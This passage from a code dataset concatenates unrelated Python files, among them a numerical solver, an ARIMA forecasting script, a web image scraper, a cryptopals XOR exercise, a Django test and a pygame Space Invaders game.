jmax]\n U11 = self._olimdd.interior_olim.U[imax, jmax]\n U0 = (1 - tx)*U00 + tx*U10\n U1 = (1 - tx)*U01 + tx*U11\n return (1 - ty)*U0 + ty*U1\n\n def __call__(self, *p):\n if self._olimdd.surf.phi(*p) <= 0:\n return np.nan\n if any(\n is_boundary(self._olimdd.interior_olim, ind)\n for ind in self._olimdd.grid.get_nearest_inds(p)\n ):\n return self._interp_boundary_layer(*p)\n else:\n return self._interp_interior(*p)\n\n def get_bilinear_interpolator(self):\n return np.vectorize(self.BilinearInterpolator(self))\n\n def get_surface_points(self):\n phi = self.phi(*self.boundary_layer_points.T)\n inds, = np.where(np.abs(phi) < _tol)\n return self.boundary_layer_points[inds, :]\n\n def get_diffraction_sources(self):\n if not self.shadow:\n raise Exception('''calling `get_diffraction_sources` only makes\nsense when solving for the numerical shadow''')\n # First, grab the vertices from the underlying surface and\n # determine which lie outside of the shadow zone\n vertices = get_vertices(self.surf)\n nn = self.get_nearest_neighbor_interpolator(ignore_surface=True)\n shadow = nn(*vertices.T)\n inds_light = np.where(shadow == 0)[0]\n diff_srcs = vertices[inds_light, :]\n # We also need to know the indices of the corresponding points\n # in `boundary_layer_points`. 
This is an awful way to do this,\n # but we can get it going, least\n diff_inds = []\n for src in diff_srcs:\n error = np.abs(self.boundary_layer_points - src)\n inds = np.where(np.all(error < _tol, axis=1))[0]\n if inds.size != 1:\n raise Exception('inconsistent vertices')\n ind = inds[0]\n diff_inds.append(ind)\n diff_inds = np.array(diff_inds)\n return diff_srcs, diff_inds\n\n def _get_parent_for_interior_ind(self, ind):\n U, ind0, ind1, lam = get_minimizer(self.interior_olim, ind)\n if ind in self.interior_to_boundary_layer:\n ind_ = self.interior_to_boundary_layer[ind]\n U_,ind0_,ind1_,lam_ = get_minimizer(self.boundary_layer_olim, ind_)\n if U_ < U:\n return ind0_, ind1_, lam_\n return ind0, ind1, lam\n\n def _get_parent_for_boundary_layer_ind(self, ind):\n U, ind0, ind1, lam = get_minimizer(self.boundary_layer_olim, ind)\n if ind in self.boundary_layer_to_interior:\n ind_ = self.boundary_layer_to_interior[ind]\n U_, ind0_, ind1_, lam_ = get_minimizer(self.interior_olim, ind_)\n if U_ < U:\n return ind0_, ind1_, lam_\n return ind0, ind1, lam\n\n # TODO: kind of a silly name, but we need to distinguish this somehow\n # TODO: what distinguishes this from regular old `_get_parent`?\n def _get_parent_ind_for_bilinear_vertex(self, x):\n ind0, ind1, lam = self._get_parent(x)\n if ind0 is None:\n return None\n if ind1 is None:\n assert lam is None\n if isinstance(ind0, int):\n ind = self.grid.get_ind(self.boundary_layer_olim.nodes[ind0])\n else:\n if ind0 is None:\n import pdb; pdb.set_trace()\n ind = ind0 if isinstance(ind0, tuple) else tuple(ind0)\n else:\n if isinstance(ind0, int):\n assert isinstance(ind1, int)\n assert lam is not None\n ind0 = self.grid.get_ind(self.boundary_layer_olim.nodes[ind0])\n ind1 = self.grid.get_ind(self.boundary_layer_olim.nodes[ind1])\n ind = tuple((1 - lam)*np.array(ind0) + lam*np.array(ind1))\n if not (self.phi(*self.grid[ind]) + _tol >= 0):\n import pdb; pdb.set_trace()\n assert self.phi(*self.grid[ind]) + _tol >= 0\n return ind\n\n def _get_parent_partially_grid_aligned(self, x, inds=None, lam=None):\n if self.ndim != 2:\n raise Exception('''\nTODO: implement `_get_parent_partially_grid_aligned in 3D''')\n\n if inds is None:\n x0, x1, lam = self.grid.get_bilinear_combination(*x)\n else:\n assert lam is not None\n assert len(inds) == 2*(self.ndim - 1) # TODO: I think?\n if isinstance(inds[0], int):\n assert all(isinstance(ind, int) for ind in inds)\n x0 = self.boundary_layer_points[inds[0]]\n x1 = self.boundary_layer_points[inds[1]]\n elif isinstance(inds[0], tuple):\n assert all(isinstance(ind, tuple) for ind in inds)\n x0 = self.grid[inds[0]]\n x1 = self.grid[inds[1]]\n else:\n raise Exception('inds of invalid type %s' % type(inds[0]))\n\n # If x0 or x1 are inside the boundary surface, then we use a\n # rootfinder to \"project\" that point onto the surface\n phi0, phi1 = self.phi(*x0), self.phi(*x1)\n if phi1 + _tol < 0:\n assert phi0 >= 0\n phi0, phi1 = phi1, phi0\n x0, x1 = x1, x0\n lam = 1 - lam\n if phi0 + _tol < 0:\n f = lambda t: self.phi(*((1 - t)*x0 + t*x1))\n t = brentq(f, 0, 1)\n assert 0 < t and t < 1\n x0 = (1 - t)*x0 + t*x1\n\n return (\n self._get_parent_ind_for_bilinear_vertex(x0),\n self._get_parent_ind_for_bilinear_vertex(x1),\n lam\n )\n\n def _get_surface_convex_combination(self, x):\n '''For a point `x`, which we assume lies somewhere on the surface\ndefined by `self.phi`, find the nearest surface points which can serve\nas vertices in a convex combination expressing `x` (i.e., there are\nsome convex coefficients T and surface points 
P such that x = P@T).\n\n '''\n r = (1.5 + _tol)*self.h\n inds = self._boundary_layer_kdtree.query_ball_point(x, r, np.inf)\n points = self.boundary_layer_points[inds, :]\n pairs, dists, lams = [], [], []\n for i, p_i in enumerate(points):\n if abs(self.phi(*p_i)) > _tol:\n continue\n for j in range(i):\n p_j = points[j]\n if abs(self.phi(*p_j)) > _tol:\n continue\n dp = p_j - p_i\n if np.linalg.norm(dp) < _tol:\n raise Exception('bad stencil')\n nonzero = np.where(abs(dp) > _tol)[0]\n ts = (x - p_i)[nonzero]/dp[nonzero]\n if len(ts) > 1 and any(\n abs(t - ts[0]) > np.sqrt(_tol) for t in ts[1:]\n ):\n continue\n t = ts[0]\n if t < 0 or t > 1:\n continue\n pairs.append((i, j))\n dists.append(np.linalg.norm(dp))\n lams.append(t)\n if len(dists) > 0:\n argmin = np.argmin(dists)\n argpair = pairs[argmin]\n return [inds[i] for i in argpair], lams[argmin]\n else:\n return [], None\n\n def _get_parent(self, x, x_prev=None):\n # First, check and see if `x` corresponds to a source point on\n # the surface\n d, ind_ = self._boundary_layer_kdtree.query(x)\n if d < _tol and ind_ in self.boundary_layer_olim.srcs:\n return None, None, None\n\n # TODO: comment case\n if d < _tol:\n return self._get_parent_for_boundary_layer_ind(ind_)\n\n # TODO: comment case\n if self.grid.is_grid_aligned(*x):\n ind = self.grid.get_nearest_ind(*x)\n if get_state(self.interior_olim, ind) != pyolim.State.BOUNDARY:\n return self._get_parent_for_interior_ind(ind)\n else:\n import pdb; pdb.set_trace()\n raise Exception('trying to get parent for boundary node')\n\n # TODO: comment case\n if abs(self.phi(*x)) < _tol:\n inds, lam = self._get_surface_convex_combination(x)\n if all(ind in self.boundary_layer_olim.srcs for ind in inds):\n return None, None, None\n else:\n return self._get_parent_partially_grid_aligned(\n x, inds=inds, lam=lam\n )\n\n # TODO: comment case\n if self.grid.is_partially_grid_aligned(*x):\n return self._get_parent_partially_grid_aligned(x)\n\n # TODO: comment case\n if x_prev is not None:\n x = self.grid.shoot_onto_first_grid_line(x_prev, x)\n return self._get_parent(x, x_prev)\n\n raise Exception(\n '''TODO: add support for points which are neither partially\n grid-aligned nor coincident with boundary layer points''')\n\n def _shoot_point_onto_surface(self, x0, x1):\n points = [\n self.boundary_layer_points[ind]\n for ind in self._boundary_layer_kdtree.query_ball_point(\n x1, (1 + _tol)*self.h, np.inf\n )\n ]\n dx = x1 - x0\n f = lambda t: self.phi(*(x0 + t*dx))\n f0, f2 = f(_tol), f(2)\n if f0 <= 0:\n import pdb; pdb.set_trace()\n assert f0 > 0\n if f2 <= 0 and any(abs(self.phi(*p)) < _tol for p in points):\n t = brentq(f, _tol, 2)\n x = x0 + t*dx\n assert abs(self.phi(*x)) < _tol\n return x\n\n def get_parent(self, x, x_prev=None):\n ind0, ind1, lam = self._get_parent(x, x_prev)\n if ind0 is None:\n return\n elif ind1 is None:\n if isinstance(ind0, tuple):\n xp = self.grid[ind0]\n else:\n xp = self.boundary_layer_olim.nodes[ind0]\n else:\n if isinstance(ind0, tuple):\n x0, x1 = self.grid[ind0], self.grid[ind1]\n xp = (1 - lam)*x0 + lam*x1\n else:\n x0 = self.boundary_layer_olim.nodes[ind0]\n x1 = self.boundary_layer_olim.nodes[ind1]\n xp = (1 - lam)*x0 + lam*x1\n # Some corrections which are helpful\n if self.phi(*x) > _tol:\n xp_shoot = self._shoot_point_onto_surface(x, xp)\n if xp_shoot is not None:\n xp = xp_shoot\n elif self.grid.is_subgrid(*xp) and abs(self.phi(*xp)) > _tol:\n xp = self.grid.shoot_onto_first_grid_line(x, xp)\n # Sometimes we'll *just* miss the surface obliquely---we want\n # to 
ensure that we \"numerically\" hit it if we can\n try:\n d, ind = self._boundary_layer_kdtree.query(xp)\n except:\n import pdb; pdb.set_trace()\n if d < self.h**2:\n xp_new = self.boundary_layer_points[ind]\n # Don't want to accidentally get stuck on the boundary\n if np.linalg.norm(xp_new - x) > _tol:\n xp = xp_new\n assert not isinstance(xp, tuple)\n return tuple(xp)\n\n def trace_characteristic(self, x, debug=False):\n phi = self.phi(*x)\n if phi + _tol < 0:\n raise Exception(\"%s does not lie in domain (phi = %g)\" % (x, phi))\n if not isinstance(x, tuple):\n x = tuple(x)\n if debug:\n print(x)\n xs = [x]\n x = self.get_parent(xs[-1], xs[-2] if len(xs) > 1 else None)\n while x is not None:\n if debug:\n print(x)\n xs.append(x)\n x = self.get_parent(xs[-1], xs[-2] if len(xs) > 1 else None)\n return np.array(xs)\n\n def get_bl_ind_from_vert_ind(self, ind):\n return self._vert_ind_to_bl_ind[ind]","sub_path":"dd.py","file_name":"dd.py","file_ext":"py","file_size_in_byte":40515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"10976601","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\n\n\ndef load_data(filepath):\n if not os.path.exists(filepath):\n return None\n\n with open(filepath) as json_file:\n return json.load(json_file)\n\n\ndef pretty_print_json(data, indent=4):\n return json.dumps(data, indent=indent, ensure_ascii=False)\n\n\ndef main():\n description = \"Pretty print for JSON\"\n parser = argparse.ArgumentParser(description=description)\n parser.add_argument(\n \"-f\", \"--filepath\",\n required=True,\n help=\"Input file\"\n )\n parser.add_argument(\n \"-i\", \"--indent\",\n help=\"Indentation size. Default: 4\",\n default=4,\n type=int\n )\n\n args = parser.parse_args()\n\n data = load_data(args.filepath)\n print(\n pretty_print_json(data, args.indent)\n )\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"pprint_json.py","file_name":"pprint_json.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"652708262","text":"import datetime\nfrom app import db\nfrom app.model.usermodel import User\n\nclass UserDao:\n @staticmethod\n def save_user(user):\n db.session.add(user)\n db.session.commit()\n db.session.refresh(user)\n return user\n\n @staticmethod\n def update_user(user):\n existing_user = UserDao.get_by_id(user.id)\n if user.firstname:\n existing_user.fistname = user.firstname\n \n if user.lastname:\n existing_user.lastname = user.lastname\n\n if user.email:\n existing_user.email = user.email\n\n if user.street:\n existing_user.street = user.street\n\n if user.city:\n existing_user.city = user.city\n\n if user.state:\n existing_user.state = user.state \n\n if user.zipcode:\n existing_user.zipcode = user.zipcode \n \n db.session.commit()\n db.session.refresh(existing_user)\n return existing_user \n\n @staticmethod\n def get_all():\n return User.query.all()\n\n @staticmethod\n def get_by_email(email_data):\n return User.query.filter_by(email=email_data).first() \n","sub_path":"app/dao/userdao.py","file_name":"userdao.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"343569376","text":"\"\"\"\nAuthor: Jing (https://github.com/gnijuohz)\n\nFlatten Binary Tree to Linked List: https://oj.leetcode.com/problems/flatten-binary-tree-to-linked-list \n\n\nGiven a binary tree, flatten it to a linked list 
in-place.\n\n\n\nFor example,\nGiven\n\n 1\n / \\\n 2 5\n / \\ \\\n 3 4 6\n\n\n\nThe flattened tree should look like:\n\n 1\n \\\n 2\n \\\n 3\n \\\n 4\n \\\n 5\n \\\n 6\n\n\nclick to show hints.\n\nHints:\nIf you notice carefully in the flattened tree, each node's right child points to the next node of a pre-order traversal. \nTags\nTree, Depth-first Search \n\"\"\"\n\n# Definition for a binary tree node\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n # @param root, a tree node\n # @return nothing, do it in place\n def flatten(self, root):\n while root:\n if root.left:\n node = root.left\n while node.right:\n node = node.right\n node.right = root.right\n root.right = root.left\n root.left = None\n root = root.right","sub_path":"solutions/Flatten-Binary-Tree-to-Linked-List.py","file_name":"Flatten-Binary-Tree-to-Linked-List.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259262769","text":"from pandas import read_csv\nfrom pandas import datetime\nfrom matplotlib import pyplot\n\ndef parser(x):\n\treturn datetime.strptime('202'+x, '%Y-%m-%d')\n \nseries = read_csv('https://raw.githubusercontent.com/ll-cooool-j/DS-Assignment/main/Datasets/Datasets%20for%20ARIMA%20(Only%20Date%20%2B%20Infected)/Vietnam%20(Date%20%2B%20Infected).csv', header=0, parse_dates=[0], index_col=0, squeeze=True, date_parser=parser)\nprint(series.head())\nseries.plot()\npyplot.show()\n\nseries.max()\n\nseries.min()\n\nfrom matplotlib import pyplot\nfrom pandas.plotting import autocorrelation_plot\nautocorrelation_plot(series)\npyplot.show()\n\n# grid search ARIMA parameters for time series\nimport warnings\nimport pandas as pd\nfrom math import sqrt\nfrom pandas import read_csv\nfrom pandas import datetime\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\n\n# evaluate an ARIMA model for a given order (p,d,q)\ndef evaluate_arima_model(X, arima_order):\n X = X.astype('float64')\n # prepare training dataset\n train_size= int(len(X) * 0.2)\n point = int(len(X) * 0.8)\n train, test = X[0:train_size], X[train_size:]\n history = [x for x in train]\n\n # make predictions\n predictions = list()\n for t in range(len(test)):\n model = ARIMA(history, order=arima_order)\n model_fit = model.fit()\n yhat = model_fit.forecast()[0]\n predictions.append(yhat)\n history.append(test[t])\n # calculate out of sample error\n rmse = sqrt(mean_squared_error(test, predictions))\n return rmse\n \n# evaluate combinations of p, d and q values for an ARIMA model\ndef evaluate_models(dataset, p_values, d_values, q_values):\n\tdataset = dataset.astype('float32')\n\tbest_score, best_cfg = float(\"inf\"), None\n\tfor p in p_values:\n\t\tfor d in d_values:\n\t\t\tfor q in q_values:\n\t\t\t\torder = (p,d,q)\n\t\t\t\ttry:\n\t\t\t\t\trmse = evaluate_arima_model(dataset, order)\n\t\t\t\t\tif rmse < best_score:\n\t\t\t\t\t\tbest_score, best_cfg = rmse, order\n\t\t\t\t\tprint('ARIMA%s RMSE=%.3f' % (order,rmse))\n\t\t\t\texcept:\n\t\t\t\t\tcontinue\n\tprint('Best ARIMA%s RMSE=%.3f' % (best_cfg, best_score))\n \n# load dataset\nidx = pd.date_range(\"2020-07-01\", periods=335)\nseries.index = idx.to_period()\n# evaluate parameters\np_values = range(0, 5)\nd_values = range(0, 3)\nq_values = range(0, 3)\nwarnings.filterwarnings(\"ignore\")\nevaluate_models(series.values, p_values, d_values, q_values)\n\n# fit an ARIMA model and plot residual 
errors\nfrom pandas import DataFrame\n# fit model\nseries = series.astype('float64')\nmodel = ARIMA(series, order=(3,2,0))\nmodel_fit = model.fit()\n# summary of fit model\nprint(model_fit.summary())\n# line plot of residuals\nresiduals = DataFrame(model_fit.resid)\nresiduals.plot()\npyplot.show()\n# density plot of residuals\nresiduals.plot(kind='kde')\npyplot.show()\n# summary stats of residuals\nprint(residuals.describe())\n\n# evaluate an ARIMA model using a walk-forward validation\nfrom pandas import read_csv\nfrom pandas import datetime\nfrom matplotlib import pyplot\nfrom statsmodels.tsa.arima_model import ARIMA\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\nimport numpy as np\nimport itertools\nfrom itertools import chain\nX = series.values.astype('float64')\n# prepare training dataset\ntrain_size= int(len(X) * 0.2)\npoint = int(len(X) * 0.8)\ntrain, test = X[0:train_size], X[point:]\nhistory = [x for x in train]\npredictions = list()\n# walk-forward validation\nfor t in range(len(test)):\n\tmodel = ARIMA(history, order=(3,2,0))\n\tmodel_fit = model.fit()\n\toutput = model_fit.forecast()\n\tyhat = output[0]\n\tpredictions.append(yhat)\n\tobs = test[t]\n\thistory.append(obs)\n\tprint('predicted=%f, expected=%f' % (yhat, obs))\n# evaluate forecasts\nrmse = sqrt(mean_squared_error(test, predictions))\nprint('Test RMSE: %.3f' % rmse)\n# plot forecasts against actual outcomes\npyplot.plot(test)\npyplot.plot(predictions, color='red')\npyplot.show()","sub_path":"Models/Version 3/ARIMA/vietnam.py","file_name":"vietnam.py","file_ext":"py","file_size_in_byte":3806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"281157631","text":"from db import get_connection, get_from_datamaster\nfrom db.tables import traits\n\nrequirements = [traits]\n\n\ndef build():\n datamaster = get_from_datamaster(\"EquipTraits.csv\")\n trait_rows_with_elements_by_text = {\n row[\"Text\"]: row\n for row in datamaster\n if row[\"TraitPropertyName\"] == \"Element\"}\n\n with get_connection() as con:\n cur = con.cursor()\n\n cur.execute(\"SELECT ElementName, Id FROM Elements\")\n element_ids_by_name = {cur_row[0]: cur_row[1]\n for cur_row in cur.fetchall()}\n\n cur.execute(\"DROP TABLE IF EXISTS TraitElements\")\n cur.execute(\"CREATE TABLE TraitElements(\"\n \"Id INTEGER PRIMARY KEY AUTOINCREMENT, \"\n \"Trait INTEGER, \"\n \"Element INTEGER, \"\n \"FOREIGN KEY(Trait) REFERENCES Traits(Id) ,\"\n \"FOREIGN KEY(Element) REFERENCES Elements(Id))\")\n\n for trait in traits.read():\n text = trait[\"text\"]\n trait_row_from_datamaster = trait_rows_with_elements_by_text.get(text)\n if trait_row_from_datamaster:\n trait_id = trait[\"id\"]\n element_id = element_ids_by_name[\n trait_row_from_datamaster[\n \"TraitPropertyValue\"]]\n cur.execute(\"INSERT INTO TraitElements (\"\n \"Trait, Element) \"\n \"VALUES (\\\"{}\\\", \\\"{}\\\")\".format(\n trait_id, element_id))\n","sub_path":"db/tables/trait_elements.py","file_name":"trait_elements.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"335734455","text":"import requests\nfrom urllib.parse import urlencode\nfrom requests.exceptions import RequestException\nimport json\nimport pymongo\nfrom bs4 import BeautifulSoup\nimport re\nfrom config import *\nimport os\nfrom hashlib import md5\nfrom multiprocessing import Pool\n\nclient = pymongo.MongoClient(MONGO_URL)\ndb = client[MONGO_DB]\n\ndef 
get_image_index(offset,keyword):\n data = {\n 'offset': offset,\n 'format': 'json',\n 'keyword': keyword,\n 'autoload': 'true',\n 'count': '20',\n 'cur_tab': '3',\n 'from': 'search_tab'\n }\n url = 'https://www.toutiao.com/search_content/?' + urlencode(data)\n print(url)\n try:\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n print('解析出错')\n return None\n\ndef parse_image_url(html):\n data = json.loads(html)\n if data and 'data' in data.keys():\n for item in data.get('data'):\n yield item.get('article_url')\n\ndef get_image_detail(url):\n try:\n response = requests.get(url)\n if response.status_code == 200:\n return response.text\n return None\n except RequestException:\n print('请求详情页解析出错')\n return None\n\ndef parse_page_detail(html,url):\n soup = BeautifulSoup(html,'lxml')\n title = soup.select('title')[0].get_text()\n image_pattern = re.compile('gallery: JSON.parse\\((.*?)\\)',re.S)\n result = re.search(image_pattern, html)\n if result:\n res = json.loads(json.loads(result.group(1)))\n if res and 'sub_images' in res:\n sub_images = res.get('sub_images')\n images = [ item.get('url') for item in sub_images]\n return {\n 'title': title,\n 'url': url,\n 'images': images\n }\ndef save_to_mongo(result):\n if db[MONGO_TABLE].insert(result):\n print('存储到mongoDB',result)\n return True\n return False\n\n\n\ndef save_image(url):\n print('正在下载', url)\n try:\n response = requests.get(url)\n if response.status_code == 200:\n content = response.content\n except RequestException:\n print('下载图片出错', url)\n file_path = '{0}/{1}.{2}'.format(os.getcwd(),md5(content).hexdigest(),'jpg')\n if not os.path.exists(file_path):\n with open(file_path,'wb') as f:\n f.write(content)\n f.close()\n\ndef main(offset):\n html = get_image_index(offset, '街拍')\n for url in parse_image_url(html):\n detail = get_image_detail(url)\n if detail:\n result = parse_page_detail(detail, url)\n if result:\n save_to_mongo(result)\n for item in result['images']:\n save_image(item)\n\n\nif __name__ == '__main__':\n groups = [x*20 for x in range(GROUP_START,GROUP_END)]\n pool = Pool()\n pool.map(main,groups)\n \n","sub_path":"jinri.py","file_name":"jinri.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"42275508","text":"# Set 1 Challenge 3\n# Single-byte XOR cipher\n\nfrom MyCrypto import MyCrypto\n\nimport binascii\n\nmcrypt = MyCrypto()\n\n# Given string\ninputString = \"1b37373331363f78151b7f2b783431333d78397828372d363c78373e783a393b3736\"\n# Convert string to bytes object\nba = binascii.unhexlify(inputString)\n\n# Initialize loop variables\nhighestScore = 0\nscoreIndex = 0\nhighestBytes = \"\"\nfor x in range(256):\n\t# Xor the byte array with a byte between 0-256\n\toutputBytes = mcrypt.singleByteXor(ba, bytes([x]))\n\t# Calculate a english-language \"score\" for the string. 
Function assumes\n\t# This byte array is ascii encoded.\n\tscore = mcrypt.scoreBytesAsAscii(outputBytes)\n\tif score > highestScore:\n\t\thighestScore = score\n\t\tscoreIndex = x\n\t\thighestBytes = outputBytes\n\n# Print results\nprint(\"Single byte with best score: 0x%x\" % scoreIndex)\nprint(\"Resulting Bytes: %s\" % highestBytes)\n","sub_path":"py/solutions/challenge03.py","file_name":"challenge03.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"256303164","text":"import glob\nimport json\nimport requests\nimport shutil\nimport time\n\nfrom datetime import timedelta, datetime\nfrom django.test import TransactionTestCase, tag\nfrom django.utils import timezone\nfrom unittest.mock import patch, Mock\nfrom test.support import EnvironmentVarGuard # Python >=3\n\nfrom data_refinery_common.models import (\n Organism,\n ComputationalResult,\n ComputationalResultAnnotation,\n ComputedFile,\n DownloaderJob,\n DownloaderJobOriginalFileAssociation,\n Experiment,\n ExperimentAnnotation,\n ExperimentSampleAssociation,\n OriginalFile,\n OriginalFileSampleAssociation,\n ProcessorJob,\n ProcessorJobOriginalFileAssociation,\n Sample,\n SampleAnnotation,\n SampleComputedFileAssociation,\n SampleResultAssociation,\n SurveyJob,\n SurveyJobKeyValue,\n)\nfrom data_refinery_common.utils import get_env_variable\nfrom data_refinery_foreman.surveyor import surveyor, utils\nfrom data_refinery_foreman.surveyor.management.commands.unsurvey import purge_experiment\n\n# Import and set logger\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\nLOCAL_ROOT_DIR = get_env_variable(\"LOCAL_ROOT_DIR\", \"/home/user/data_store\")\nLOOP_TIME = 5 # seconds\nMAX_WAIT_TIME = timedelta(minutes=15)\n\ndef wait_for_job(job, job_class: type, start_time: datetime):\n \"\"\"Monitors the `job_class` table for when `job` is done.\"\"\"\n job = job_class.objects.filter(id=job.id).get()\n while job.success is None and timezone.now() - start_time < MAX_WAIT_TIME:\n logger.info(\"Still polling the %s.\",\n job_class.__name__)\n time.sleep(LOOP_TIME)\n job = job_class.objects.filter(id=job.id).get()\n\n if timezone.now() - start_time > MAX_WAIT_TIME:\n logger.error(\"%s job timed out!\", job_class.__name__)\n\n return job\n\n\n# TransactionTestCase makes database calls complete before the test\n# ends. 
Otherwise the workers wouldn't actually be able to find the\n# job in the database because it'd be stuck in a transaction.\nclass NoOpEndToEndTestCase(TransactionTestCase):\n @tag(\"slow\")\n def test_no_op(self):\n \"\"\"Survey, download, then process an experiment we know is NO_OP.\"\"\"\n # Clear out pre-existing work dirs so there's no conflicts:\n\n self.env = EnvironmentVarGuard()\n self.env.set('RUNING_IN_CLOUD', 'False')\n with self.env:\n for work_dir in glob.glob(LOCAL_ROOT_DIR + \"/processor_job_*\"):\n shutil.rmtree(work_dir)\n\n # Make sure there are no already existing jobs we might poll for unsuccessfully.\n DownloaderJobOriginalFileAssociation.objects.all().delete()\n DownloaderJob.objects.all().delete()\n ProcessorJobOriginalFileAssociation.objects.all().delete()\n ProcessorJob.objects.all().delete()\n\n # Prevent a call being made to NCBI's API to determine\n # organism name/id.\n organism = Organism(name=\"HOMO_SAPIENS\", taxonomy_id=9606, is_scientific_name=True)\n organism.save()\n\n accession_code = \"E-GEOD-3303\"\n survey_job = surveyor.survey_experiment(accession_code, \"ARRAY_EXPRESS\")\n\n self.assertTrue(survey_job.success)\n\n downloader_jobs = DownloaderJob.objects.all()\n self.assertGreater(downloader_jobs.count(), 0)\n\n logger.info(\"Survey Job finished, waiting for Downloader Jobs to complete.\")\n start_time = timezone.now()\n for downloader_job in downloader_jobs:\n downloader_job = wait_for_job(downloader_job, DownloaderJob, start_time)\n self.assertTrue(downloader_job.success)\n\n processor_jobs = ProcessorJob.objects.all()\n self.assertGreater(processor_jobs.count(), 0)\n\n logger.info(\"Downloader Jobs finished, waiting for processor Jobs to complete.\")\n start_time = timezone.now()\n for processor_job in processor_jobs:\n processor_job = wait_for_job(processor_job, ProcessorJob, start_time)\n self.assertTrue(processor_job.success)\n\n # Test that the unsurveyor deletes all objects related to the experiment\n purge_experiment(accession_code)\n\n self.assertEqual(Experiment.objects.all().count(), 0)\n self.assertEqual(ExperimentAnnotation.objects.all().count(), 0)\n self.assertEqual(ExperimentSampleAssociation.objects.all().count(), 0)\n self.assertEqual(Sample.objects.all().count(), 0)\n self.assertEqual(SampleAnnotation.objects.all().count(), 0)\n self.assertEqual(OriginalFile.objects.all().count(), 0)\n self.assertEqual(OriginalFileSampleAssociation.objects.all().count(), 0)\n self.assertEqual(SampleResultAssociation.objects.all().count(), 0)\n self.assertEqual(ComputationalResult.objects.all().count(), 0)\n self.assertEqual(ComputationalResultAnnotation.objects.all().count(), 0)\n self.assertEqual(SampleComputedFileAssociation.objects.all().count(), 0)\n self.assertEqual(ComputedFile.objects.all().count(), 0)\n self.assertEqual(DownloaderJob.objects.all().count(), 0)\n self.assertEqual(DownloaderJobOriginalFileAssociation.objects.all().count(), 0)\n self.assertEqual(ProcessorJob.objects.all().count(), 0)\n self.assertEqual(ProcessorJobOriginalFileAssociation.objects.all().count(), 0)\n","sub_path":"foreman/data_refinery_foreman/surveyor/test_end_to_end.py","file_name":"test_end_to_end.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"161394420","text":"import itertools\nimport math\n\n\ndef issquare(n):\n if int(math.sqrt(n)) * int(math.sqrt(n)) == n:\n return True\n else:\n return False\n\n\ndef isvalid(l):\n temp = []\n for i in range(len(l) - 
1):\n temp.append(int(l[i]) + int(l[i+1]))\n\n for i in range(len(temp)):\n if not issquare(temp[i]):\n return False\n return True\n\n\nl = input().split(',')\n\nvalids = list(itertools.permutations(l))\ns = []\n\nfor i in range(len(valids)):\n if not valids[i] in s:\n s.append(valids[i])\n\nl1 = []\nfor i in range(len(s)):\n if isvalid(s[i]):\n l1.append(s[i])\n\nprint(len(l1))\n\n\n\n\n\n\n","sub_path":"Code/CodeRecords/2360/60691/274040.py","file_name":"274040.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"525960728","text":"def bubble_sort(A):\n \"\"\"\n Sort sequence of numbers by swapping adjacent elements out of order.\n\n Parameters\n ----------\n A : array-like of shape (n.)\n Sequence of numbers.\n \n Returns\n -------\n A : array-like of shape (n,)\n Sorted sequence of numbers.\n \"\"\"\n # Loop through array ending at 2nd to last element.\n for i in range(len(A) - 1):\n\n # For each element loop backwards through array.\n for j in range(len(A) - 1, i, -1):\n\n # Check whether adjacent elements are out of order.\n if A[j] < A[j - 1]:\n\n # Swap elements.\n A[j], A[j - 1] = A[j - 1], A[j]\n\n return A","sub_path":"algos/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"406580899","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 22 17:00:55 2020\n\n@author: prudh\n\"\"\"\n\nimport pygame\nimport random\nimport math\nimport os\nimport neat\nfrom pygame import mixer\nimport time\nimport visualize\nimport pickle\nimport threading\n\n\n\n#Initializing pygame\npygame.init()\n\n#initializing the screen\nscreen = pygame.display.set_mode((800,600))\n\n#Titile & Icon\npygame.display.set_caption(\"Space Invaders\")\nicon = pygame.image.load(\"alien.png\")\npygame.display.set_icon(icon)\n\n#score\nscore_value = 0\nfont = pygame.font.Font('freesansbold.ttf',45)\n\ntextX = 300\ntextY = 20\n\ngame_over = pygame.font.Font('freesansbold.ttf',65)\n\ndef display_font(x,y):\n score = font.render(\"Score:\" + str(score_value),True,(255,255,255))\n screen.blit(score,(x,y))\n \ndef display_gameover():\n over = game_over.render(\"Game Over\",True,(255,255,255))\n screen.blit(over,(250,280))\n\n#Background\nbackground = pygame.image.load(\"background.png\")\n\n#Background sound\n#mixer.music.load(\"background.wav\")\n#mixer.music.play(-1)\n\n#player\nplayerimg = pygame.image.load(\"space-invaders.png\")\nplayerimg = pygame.transform.scale(playerimg, (45, 45))\n\nplayerX = 350\nplayerY = 500\nplayerX_change = 0\n\ndef player(x,y):\n 